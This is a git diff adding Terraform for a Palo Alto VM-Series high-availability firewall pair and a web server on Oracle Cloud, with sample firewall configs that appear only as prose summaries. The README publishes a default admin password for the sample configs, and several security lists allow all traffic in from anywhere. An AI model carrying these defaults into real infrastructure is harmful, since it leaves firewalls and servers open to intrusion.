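+run(["terraform", "apply", "oci-ha.plan"])
+```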
+
+The folder fw-configs contains sample configuration files for the FW. These configuration files have HA pre-configured, allow SSH access to the server, and permit all outbound access to the internet. The username is 'admin' and the password is 'Pal0Alt0@123', which should be changed immediately.
+
+## Support Policy
+These files are released under an as-is, best-effort support policy. These scripts should be seen as community supported, and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used by the scripts or templates (the VM-Series firewall) is still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/oci/HA/compartment.tf b/oci/HA/compartment.tf
new file mode 100644
index 00000000..0b053323
--- /dev/null
+++ b/oci/HA/compartment.tf
@@ -0,0 +1,6 @@
+resource "oci_identity_compartment" "compartment" {
+ compartment_id = "${var.parent_compartment_ocid}"
+ name = "${var.compartment_name}"
+ description = "compartment created by terraform"
+ enable_delete = true
+}
\ No newline at end of file
diff --git a/oci/HA/firewalls.tf b/oci/HA/firewalls.tf
new file mode 100644
index 00000000..2496016e
--- /dev/null
+++ b/oci/HA/firewalls.tf
@@ -0,0 +1,60 @@
+resource "oci_core_instance" "firewall1" {
+ availability_domain = "${var.fw1_availability_domain}"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ display_name = "FW-A"
+ shape = "${var.fw_shape_size}"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.management.id}"
+ private_ip = "${var.fw1_management_ip}"
+ display_name = "management"
+ assign_public_ip = true
+ skip_source_dest_check = false
+ #nsg_ids = ["${oci_core_network_security_group.management.id}"]
+ }
+
+ source_details {
+ source_type = "image"
+ source_id = "${var.fw_ocid}"
+ boot_volume_size_in_gbs = "60"
+ }
+ preserve_boot_volume = false
+
+ metadata = {
+ ssh_authorized_keys = "${var.ssh_authorized_key}"
+# user_data = "${base64encode(file("./userdata/bootstrap"))}"
+ }
+ timeouts {
+ create = "60m"
+ }
+}
+resource "oci_core_instance" "firewall2" {
+ availability_domain = "${var.fw2_availability_domain}"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ display_name = "FW-B"
+ shape = "${var.fw_shape_size}"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.management.id}"
+ private_ip = "${var.fw2_management_ip}"
+ display_name = "management"
+ assign_public_ip = true
+ skip_source_dest_check = false
+ #nsg_ids = ["${oci_core_network_security_group.management.id}"]
+ }
+
+ source_details {
+ source_type = "image"
+ source_id = "${var.fw_ocid}"
+ boot_volume_size_in_gbs = "60"
+ }
+ preserve_boot_volume = false
+
+ metadata = {
+ ssh_authorized_keys = "${var.ssh_authorized_key}"
+# user_data = "${base64encode(file("./userdata/bootstrap"))}"
+ }
+ timeouts {
+ create = "60m"
+ }
+}
\ No newline at end of file
diff --git a/oci/HA/fw-configs/HA-FWA.xml b/oci/HA/fw-configs/HA-FWA.xml
new file mode 100644
index 00000000..ae6c5c2d
--- /dev/null
+++ b/oci/HA/fw-configs/HA-FWA.xml
@@ -0,0 +1,623 @@
+<!--
+  PAN-OS bootstrap configuration for FW-A (623 lines of XML). The XML markup was lost when this document
+  was extracted, so the full file is not reproduced here. Values still recoverable from the remnants
+  include: hostname FWA, management IP 192.168.0.11/255.255.255.0 with gateway 192.168.0.1, HA group 1
+  peering with 192.168.0.12 over ethernet1/3 (192.168.30.101/255.255.255.0, gateway 192.168.30.1),
+  dataplane interfaces ethernet1/1 and ethernet1/2, a default route via 192.168.1.1 and a
+  192.168.101.0/24 route via 192.168.2.1, DNS servers 169.254.169.254 and 8.8.8.8, NTP servers
+  us.pool.ntp.org and pool.ntp.org, weekly content downloads from updates.paloaltonetworks.com, security
+  rules allowing trust-to-untrust SSH and untrust-to-trust traffic, and NAT/address objects for web1
+  (192.168.101.2) and the floating untrust IP 192.168.1.100.
+-->
diff --git a/oci/HA/fw-configs/HA-FWB.xml b/oci/HA/fw-configs/HA-FWB.xml
new file mode 100644
index 00000000..6b5d41ce
--- /dev/null
+++ b/oci/HA/fw-configs/HA-FWB.xml
@@ -0,0 +1,623 @@
+<!--
+  PAN-OS bootstrap configuration for FW-B (623 lines of XML), mirroring HA-FWA.xml. The XML markup was
+  lost when this document was extracted, so the full file is not reproduced here. Values still
+  recoverable from the remnants include: hostname FWB, management IP 192.168.0.12/255.255.255.0 with
+  gateway 192.168.0.1, HA group 1 peering with 192.168.0.11 over ethernet1/3 (192.168.30.102/255.255.255.0,
+  gateway 192.168.30.1), dataplane interfaces ethernet1/1 and ethernet1/2, and the same static routes,
+  DNS, NTP, update schedule, security rules and NAT/address objects as FW-A (web1 192.168.101.2 behind
+  the floating untrust IP 192.168.1.100).
+-->
diff --git a/oci/HA/identity_policy.tf b/oci/HA/identity_policy.tf
new file mode 100644
index 00000000..c2d601b7
--- /dev/null
+++ b/oci/HA/identity_policy.tf
@@ -0,0 +1,14 @@
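+// The dynamic group matches the two firewall instances, and the policies let members of that group use
+// virtual-network-family and instance-family resources in the compartment. This is what allows the
+// VM-Series HA plugin to re-assign the floating secondary IPs at failover.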
+resource "oci_identity_dynamic_group" "ha" {
+ compartment_id = "${var.tenancy_ocid}"
+ name = "HA"
+ description = "dynamic group created by terraform"
+ matching_rule = "any {ANY {instance.id = '${oci_core_instance.firewall1.id}',instance.id = '${oci_core_instance.firewall2.id}'}}"
+}
+resource "oci_identity_policy" "ha" {
+ name = "HA"
+ description = "dynamic policy created by terraform"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ statements = ["Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use virtual-network-family in compartment ${oci_identity_compartment.compartment.name}",
+ "Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use instance-family in compartment ${oci_identity_compartment.compartment.name}",
+ ]
+}
\ No newline at end of file
diff --git a/oci/HA/internet_gateway.tf b/oci/HA/internet_gateway.tf
new file mode 100644
index 00000000..27439e7d
--- /dev/null
+++ b/oci/HA/internet_gateway.tf
@@ -0,0 +1,6 @@
+resource "oci_core_internet_gateway" "internet_gateway" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "IG-PANW"
+ enabled = true
+}
\ No newline at end of file
diff --git a/oci/HA/providers.tf b/oci/HA/providers.tf
new file mode 100644
index 00000000..27515797
--- /dev/null
+++ b/oci/HA/providers.tf
@@ -0,0 +1,11 @@
+#terraform {
+# required_version = ">= 0.12"
+#}
+
+provider "oci" {
+ tenancy_ocid = "${var.tenancy_ocid}"
+ user_ocid = "${var.user_ocid}"
+ fingerprint = "${var.fingerprint}"
+ private_key_path = "${var.private_key_path}"
+ region = "${var.region}"
+}
\ No newline at end of file
diff --git a/oci/HA/route_tables.tf b/oci/HA/route_tables.tf
new file mode 100644
index 00000000..2e086160
--- /dev/null
+++ b/oci/HA/route_tables.tf
@@ -0,0 +1,24 @@
+resource "oci_core_route_table" "public" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "RT-Public"
+
+ route_rules {
+ description = "default"
+ destination = "0.0.0.0/0"
+ destination_type = "CIDR_BLOCK"
+ network_entity_id = "${oci_core_internet_gateway.internet_gateway.id}"
+ }
+}
+resource "oci_core_route_table" "web" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "RT-Web"
+
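+  // The web subnet's default route points at the trust-side floating IP, so server egress always
+  // follows whichever firewall currently owns that secondary IP.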
+ route_rules {
+ description = "default"
+ destination = "0.0.0.0/0"
+ destination_type = "CIDR_BLOCK"
+ network_entity_id = "${oci_core_private_ip.firewall_trust_secondary_private.id}"
+ }
+}
\ No newline at end of file
diff --git a/oci/HA/secondary_ips.tf b/oci/HA/secondary_ips.tf
new file mode 100644
index 00000000..289254e3
--- /dev/null
+++ b/oci/HA/secondary_ips.tf
@@ -0,0 +1,17 @@
+// The secondary IP addresses are initially attached to firewall1 but will float between the firewalls in the event of a failover.
+resource "oci_core_private_ip" "firewall_untrust_secondary_private" {
+ vnic_id = "${oci_core_vnic_attachment.firewall1_untrust.vnic_id}"
+ display_name = "firewall_untrust_secondary_private"
+ ip_address = "${var.untrust_floating_ip}"
+}
+resource "oci_core_private_ip" "firewall_trust_secondary_private" {
+ vnic_id = "${oci_core_vnic_attachment.firewall1_trust.vnic_id}"
+ display_name = "firewall_trust_secondary_private"
+ ip_address = "${var.trust_floating_ip}"
+}
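+// The reserved public IP below is bound to the untrust floating private IP, so inbound traffic
+// continues to reach the active firewall after the floating IP moves.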
+resource "oci_core_public_ip" "firewall_untrust_secondary_public" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ lifetime = "RESERVED"
+ display_name = "firewall_untrust_secondary_public"
+ private_ip_id = "${oci_core_private_ip.firewall_untrust_secondary_private.id}"
+}
\ No newline at end of file
diff --git a/oci/HA/security_lists.tf b/oci/HA/security_lists.tf
new file mode 100644
index 00000000..bfa97d25
--- /dev/null
+++ b/oci/HA/security_lists.tf
@@ -0,0 +1,78 @@
+resource "oci_core_security_list" "management" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "SL-mgmt"
+ egress_security_rules {
+ protocol = "all"
+ destination = "0.0.0.0/0"
+ stateless = false
+ }
+ ingress_security_rules {
+ protocol = "6"
+ source = "${var.fw_mgmt_src_ip}"
+ stateless = false
+ tcp_options {
+ min = 22
+ max = 22
+ }
+ }
+ ingress_security_rules {
+ protocol = "6"
+ source = "${var.fw_mgmt_src_ip}"
+ stateless = false
+ tcp_options {
+ min = 443
+ max = 443
+ }
+ }
+ ingress_security_rules {
+ protocol = "all"
+ source = "${var.management_cidr}"
+ stateless = false
+ }
+}
+resource "oci_core_security_list" "untrust" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "SL-untrust"
+ egress_security_rules {
+ protocol = "all"
+ destination = "0.0.0.0/0"
+ stateless = false
+ }
+ ingress_security_rules {
+ protocol = "all"
+ source = "0.0.0.0/0"
+ stateless = false
+ }
+}
+resource "oci_core_security_list" "trust" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "SL-trust"
+ egress_security_rules {
+ protocol = "all"
+ destination = "0.0.0.0/0"
+ stateless = false
+ }
+ ingress_security_rules {
+ protocol = "all"
+ source = "0.0.0.0/0"
+ stateless = false
+ }
+}
+resource "oci_core_security_list" "web" {
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ display_name = "SL-web"
+ egress_security_rules {
+ protocol = "all"
+ destination = "0.0.0.0/0"
+ stateless = false
+ }
+ ingress_security_rules {
+ protocol = "all"
+ source = "0.0.0.0/0"
+ stateless = false
+ }
+}
\ No newline at end of file
diff --git a/oci/HA/server.tf b/oci/HA/server.tf
new file mode 100644
index 00000000..9a64b4eb
--- /dev/null
+++ b/oci/HA/server.tf
@@ -0,0 +1,26 @@
+resource "oci_core_instance" "web1" {
+ availability_domain = "${var.server_availability_domain}"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ display_name = "web1"
+ shape = "${var.server_shape_size}"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.web.id}"
+ display_name = "web1"
+ private_ip = "${var.web1_ip}"
+ assign_public_ip = false
+ }
+
+ source_details {
+ source_type = "image"
+ source_id = "${var.ubuntu_image_ocid[var.region]}"
+ boot_volume_size_in_gbs = "60"
+ }
+ metadata = {
+ ssh_authorized_keys = "${var.ssh_authorized_key}"
+ #user_data = "${base64encode(file("./userdata/bootstrap"))}"
+ }
+ timeouts {
+ create = "60m"
+ }
+}
\ No newline at end of file
diff --git a/oci/HA/terraform.tfvars b/oci/HA/terraform.tfvars
new file mode 100644
index 00000000..61c5ee9f
--- /dev/null
+++ b/oci/HA/terraform.tfvars
@@ -0,0 +1,32 @@
+tenancy_ocid = ""
+user_ocid = ""
+fingerprint = ""
+private_key_path = "/root/.oci/oci_api_key.pem"
+parent_compartment_ocid = ""
+ssh_authorized_key = ""
+fw_mgmt_src_ip = ""
+region = "us-ashburn-1"
+fw1_availability_domain = "PFNB:US-ASHBURN-AD-1"
+fw2_availability_domain = "PFNB:US-ASHBURN-AD-2"
+server_availability_domain = "PFNB:US-ASHBURN-AD-1"
+compartment_name = "PANW-compartment"
+vcn_cidr = "192.168.0.0/16"
+management_cidr = "192.168.0.0/24"
+fw1_management_ip = "192.168.0.11"
+fw2_management_ip = "192.168.0.12"
+untrust_cidr = "192.168.1.0/24"
+fw1_untrust_ip = "192.168.1.101"
+fw2_untrust_ip = "192.168.1.102"
+untrust_floating_ip = "192.168.1.100"
+trust_cidr = "192.168.2.0/24"
+fw1_trust_ip = "192.168.2.101"
+fw2_trust_ip = "192.168.2.102"
+trust_floating_ip = "192.168.2.100"
+ha2_cidr = "192.168.30.0/24"
+fw1_ha2_ip = "192.168.30.101"
+fw2_ha2_ip = "192.168.30.102"
+web_cidr = "192.168.101.0/24"
+web1_ip = "192.168.101.2"
+fw_ocid = "ocid1.image.oc1..aaaaaaaapq6xrfl3j2qs5vjgeni7c7hyq6myg7uaqzdzxsk373qrxbzyv7aa"
+fw_shape_size = "VM.Standard2.4"
+server_shape_size = "VM.Standard2.1"
diff --git a/oci/HA/variables.tf b/oci/HA/variables.tf
new file mode 100644
index 00000000..36afaaca
--- /dev/null
+++ b/oci/HA/variables.tf
@@ -0,0 +1,120 @@
+variable "tenancy_ocid" {
+ description = "OCID of the tenant"
+}
+variable "user_ocid" {
+ description = "OCID of the user creating the infrastructure"
+}
+variable "fingerprint" {
+ description = "fingerprint of the API key used for authentication"
+}
+variable "private_key_path" {
+ description = "path to the private key used for authentication"
+}
+variable "region" {
+ description = "region where the compartment is located"
+}
+variable "parent_compartment_ocid" {
+ description = "OCID of the parent compartment"
+}
+variable "compartment_name" {
+ description = "name of the compartment to create"
+}
+variable "vcn_cidr" {
+ description = "cidr block to use for the vcn"
+}
+variable "fw_mgmt_src_ip" {
+ description = "source IP or CIDR allowed to manage the FW"
+}
+variable "fw_ocid" {
+ description = "OCID of the FW image to deploy"
+}
+variable "fw_shape_size" {
+ description = "shape size for the FW (VM.Standard2.4 minimum)"
+}
+variable "fw1_availability_domain" {
+ description = "availability domain into which FW1 will be deployed"
+}
+variable "fw2_availability_domain" {
+ description = "availability domain into which FW2 will be deployed"
+}
+variable "ssh_authorized_key" {
+ description = "public SSH key to install on the hosts"
+}
+variable "management_cidr" {
+ description = "CIDR block for the management subnet"
+}
+variable "fw1_management_ip" {
+ description = "IP address for the fw1 management interface"
+}
+variable "fw2_management_ip" {
+ description = "IP address for the fw2 management interface"
+}
+variable "untrust_cidr" {
+ description = "CIDR block for the untrust subnet"
+}
+variable "fw1_untrust_ip" {
+ description = "IP address for the fw1 untrust interface"
+}
+variable "fw2_untrust_ip" {
+ description = "IP address for the fw2 untrust interface"
+}
+variable "untrust_floating_ip" {
+ description = "floating IP address for the untrust interface"
+}
+variable "trust_cidr" {
+ description = "CIDR block for the trust subnet"
+}
+variable "fw1_trust_ip" {
+ description = "IP address for the fw1 trust interface"
+}
+variable "fw2_trust_ip" {
+ description = "IP address for the fw2 trust interface"
+}
+variable "trust_floating_ip" {
+ description = "floating IP address for the trust interface"
+}
+variable "ha2_cidr" {
+ description = "CIDR block for the ha2 subnet"
+}
+variable "fw1_ha2_ip" {
+ description = "IP address for the fw1 ha2 interface"
+}
+variable "fw2_ha2_ip" {
+ description = "IP address for the fw2 ha2 interface"
+}
+variable "web_cidr" {
+ description = "CIDR block for the web subnet"
+}
+variable "web1_ip" {
+ description = "IP address for web1"
+}
+variable "server_shape_size" {
+ description = "shape size for the server"
+}
+variable "ubuntu_image_ocid" {
+ type = "map"
+ default = {
+ ap-melbourne-1 = "ocid1.image.oc1.ap-melbourne-1.aaaaaaaajdcf2heyxkmgvdtbbczu74cl6qbc5gxew56c3y3q6dbjsul6b6aq"
+ ap-mumbai-1 = "ocid1.image.oc1.ap-mumbai-1.aaaaaaaayjxakga6uhq3dcprkziczfnoug5rpwjqfot6s6lteuylbcjv4bya"
+ ap-osaka-1 = "ocid1.image.oc1.ap-osaka-1.aaaaaaaapc4kllvk4vib7fhnug7ukm2txuhitdrfhyt7sickogqt7iswvfqq"
+ ap-seoul-1 = "ocid1.image.oc1.ap-seoul-1.aaaaaaaazrfma7gwjj36m7vcxeork2azxshoymo4zbi5jfti6zqvcmopix7a"
+ ap-sydney-1 = "ocid1.image.oc1.ap-sydney-1.aaaaaaaauskrlywocekwttksypjq5imxevgpfayhfgobemmdio2e42nj5hrq"
+ ap-tokyo-1 = "ocid1.image.oc1.ap-tokyo-1.aaaaaaaa3rhjibflbzqbloypnpxegzyxxni2wyllbbilhzowvcja3iz7h4sq"
+ ca-montreal-1 = "ocid1.image.oc1.ca-montreal-1.aaaaaaaainz6oiqrgokqfvxpbfwciswg3hjsbno4dlmxkwtl6v6e6tjrsz5a"
+ ca-toronto-1 = "ocid1.image.oc1.ca-toronto-1.aaaaaaaatkqz6qc7iojynkffjs75jrvqnxnvycdusat4v3iiea25zb2kftta"
+ eu-amsterdam-1 = "ocid1.image.oc1.eu-amsterdam-1.aaaaaaaabp7qk76ijyrminiue2m3biqjfz4dzpfdrdtg5cv2me2gyuptanpq"
+ eu-frankfurt-1 = "ocid1.image.oc1.eu-frankfurt-1.aaaaaaaaztrgnqdk6lctht72zn4wjpy6fpaacarblsrl74dq2vnzgipctgeq"
+ eu-zurich-1 = "ocid1.image.oc1.eu-zurich-1.aaaaaaaaoj3jvr57jyg5ugeb2oyxr3vdrqt47mls66j3nhb7xjtmlokcdchq"
+ me-jeddah-1 = "ocid1.image.oc1.me-jeddah-1.aaaaaaaaa7crfvj23zizibv4n2dne4uc3ksw35judghweftep4mdtlcdmdwa"
+ sa-saopaulo-1 = "ocid1.image.oc1.sa-saopaulo-1.aaaaaaaabraq4wsw67oivaicttnmw6oegizim3pb5abxzoj63uzfxxhahuqa"
+ uk-gov-london-1 = "ocid1.image.oc4.uk-gov-london-1.aaaaaaaafxczrxrlkccsbyaa2ertdehkpqttx73zwzeq75bowbklsp2pqi2a"
+ uk-london-1 = "ocid1.image.oc1.uk-london-1.aaaaaaaa276jkgmoibf3teixw7olzx4oa64bakbj5qaewwxtfwwpenxcf3jq"
+ us-ashburn-1 = "ocid1.image.oc1.iad.aaaaaaaa6x4mvi4tkiigibgtovqbinjnmr4qibuygpkifitgd5b7knjni7fq"
+ us-langley-1 = "ocid1.image.oc2.us-langley-1.aaaaaaaa65aorjlfq342p2rcjl5afekasasjsrvimqcb7jrjbu5yyyabdvbq"
+ us-luke-1 = "ocid1.image.oc2.us-luke-1.aaaaaaaaqgziggzzcow75qwnsovoooxioawzuczpmewiom2ljpf4ywey4dsq"
+ us-phoenix-1 = "ocid1.image.oc1.phx.aaaaaaaagmkn4gdhvvx24kiahh2b2qchsictjjnujfw7vtytftmvnteyfckq"
+ }
+}
+variable "server_availability_domain" {
+ description = "availability domain into which the server will be deployed"
+}
\ No newline at end of file
diff --git a/oci/HA/vcn_subnets.tf b/oci/HA/vcn_subnets.tf
new file mode 100644
index 00000000..6b67c410
--- /dev/null
+++ b/oci/HA/vcn_subnets.tf
@@ -0,0 +1,46 @@
+resource "oci_core_vcn" "vcn" {
+ cidr_block = "${var.vcn_cidr}"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ display_name = "VCN-PANW"
+}
+resource "oci_core_subnet" "management" {
+ cidr_block = "${var.management_cidr}"
+ display_name = "mgmt"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ route_table_id = "${oci_core_route_table.public.id}"
+ security_list_ids = ["${oci_core_security_list.management.id}"]
+}
+resource "oci_core_subnet" "untrust" {
+ cidr_block = "${var.untrust_cidr}"
+ display_name = "untrust"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ route_table_id = "${oci_core_route_table.public.id}"
+ security_list_ids = ["${oci_core_security_list.untrust.id}"]
+}
+resource "oci_core_subnet" "trust" {
+ cidr_block = "${var.trust_cidr}"
+ display_name = "trust"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ security_list_ids = ["${oci_core_security_list.trust.id}"]
+ prohibit_public_ip_on_vnic = true
+}
+resource "oci_core_subnet" "ha2" {
+ cidr_block = "${var.ha2_cidr}"
+ display_name = "HA2"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ security_list_ids = ["${oci_core_security_list.trust.id}"]
+ prohibit_public_ip_on_vnic = true
+}
+resource "oci_core_subnet" "web" {
+ cidr_block = "${var.web_cidr}"
+ display_name = "web"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ route_table_id = "${oci_core_route_table.web.id}"
+ security_list_ids = ["${oci_core_security_list.web.id}"]
+ prohibit_public_ip_on_vnic = true
+}
\ No newline at end of file
diff --git a/oci/HA/vnics.tf b/oci/HA/vnics.tf
new file mode 100644
index 00000000..cab888d5
--- /dev/null
+++ b/oci/HA/vnics.tf
@@ -0,0 +1,82 @@
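+// The depends_on chains below attach the VNICs in a fixed order (untrust, then trust, then ha2) so that
+// they map predictably to ethernet1/1, ethernet1/2 and ethernet1/3 on each VM-Series instance.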
+resource "oci_core_vnic_attachment" "firewall1_untrust" {
+ instance_id = "${oci_core_instance.firewall1.id}"
+ display_name = "firewall1_untrust"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.untrust.id}"
+ private_ip = "${var.fw1_untrust_ip}"
+ display_name = "untrust"
+ assign_public_ip = false
+ skip_source_dest_check = true
+ #nsg_ids = ["${oci_core_network_security_group.untrust.id}"]
+ }
+}
+resource "oci_core_vnic_attachment" "firewall1_trust" {
+ instance_id = "${oci_core_instance.firewall1.id}"
+ display_name = "firewall1_trust"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.trust.id}"
+ private_ip = "${var.fw1_trust_ip}"
+ display_name = "trust"
+ assign_public_ip = false
+ skip_source_dest_check = true
+ #nsg_ids = ["${oci_core_network_security_group.trust.id}"]
+ }
+ depends_on = ["oci_core_vnic_attachment.firewall1_untrust"]
+}
+resource "oci_core_vnic_attachment" "firewall1_ha2" {
+ instance_id = "${oci_core_instance.firewall1.id}"
+ display_name = "firewall1_ha2"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.ha2.id}"
+ private_ip = "${var.fw1_ha2_ip}"
+ display_name = "ha2"
+ assign_public_ip = false
+ skip_source_dest_check = false
+ #nsg_ids = ["${oci_core_network_security_group.ha.id}"]
+ }
+ depends_on = ["oci_core_vnic_attachment.firewall1_trust"]
+}
+resource "oci_core_vnic_attachment" "firewall2_untrust" {
+ instance_id = "${oci_core_instance.firewall2.id}"
+ display_name = "firewall2_untrust"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.untrust.id}"
+ private_ip = "${var.fw2_untrust_ip}"
+ display_name = "untrust"
+ assign_public_ip = false
+ skip_source_dest_check = true
+ #nsg_ids = ["${oci_core_network_security_group.untrust.id}"]
+ }
+}
+resource "oci_core_vnic_attachment" "firewall2_trust" {
+ instance_id = "${oci_core_instance.firewall2.id}"
+ display_name = "firewall2_trust"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.trust.id}"
+ private_ip = "${var.fw2_trust_ip}"
+ display_name = "trust"
+ assign_public_ip = false
+ skip_source_dest_check = true
+ #nsg_ids = ["${oci_core_network_security_group.trust.id}"]
+ }
+ depends_on = ["oci_core_vnic_attachment.firewall2_untrust"]
+}
+resource "oci_core_vnic_attachment" "firewall2_ha2" {
+ instance_id = "${oci_core_instance.firewall2.id}"
+ display_name = "firewall2_ha2"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.ha2.id}"
+ private_ip = "${var.fw2_ha2_ip}"
+ display_name = "ha2"
+ assign_public_ip = false
+ skip_source_dest_check = false
+ #nsg_ids = ["${oci_core_network_security_group.ha.id}"]
+ }
+ depends_on = ["oci_core_vnic_attachment.firewall2_trust"]
+}
\ No newline at end of file
diff --git a/oci/README.md b/oci/README.md
new file mode 100644
index 00000000..073864b0
--- /dev/null
+++ b/oci/README.md
@@ -0,0 +1 @@
+Terraform for OCI